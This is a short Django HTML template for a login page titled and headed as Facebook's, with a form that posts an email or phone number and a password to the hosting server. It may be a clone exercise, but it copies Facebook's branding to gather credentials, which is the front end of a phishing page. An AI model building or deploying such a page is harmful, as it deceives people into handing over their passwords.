<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
  <title>Facebook Login</title>
</head>
<body class="bg-gray-100 flex items-center justify-center min-h-screen">

  <div class="bg-white p-8 rounded shadow-md md:w-96 w-full">
    <h1 class="text-2xl font-semibold mb-6 text-center">Log in to Facebook</h1>

    <!-- Login Form -->
    <form method="post">
        {% csrf_token %}
      <div class="mb-4">
        <label for="email" class="block text-sm font-medium text-gray-600">Email or Phone</label>
        <input type="text" id="email" name="username" required="required" placeholder="Email or Phone" class="mt-1 p-2 w-full border rounded-md">
      </div>

      <div class="mb-4">
        <label for="password" class="block text-sm font-medium text-gray-600">Password</label>
        <input type="password" placeholder="Password" id="password" name="password" class="mt-1 p-2 w-full border rounded-md">
      </div>

      <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded-md">Log In</button>
    </form>

    <div class="mt-6 text-center">
      <a href="#" class="text-sm text-blue-500">Forgot Password?</a>
    </div>
  </div>

</body>
</html>
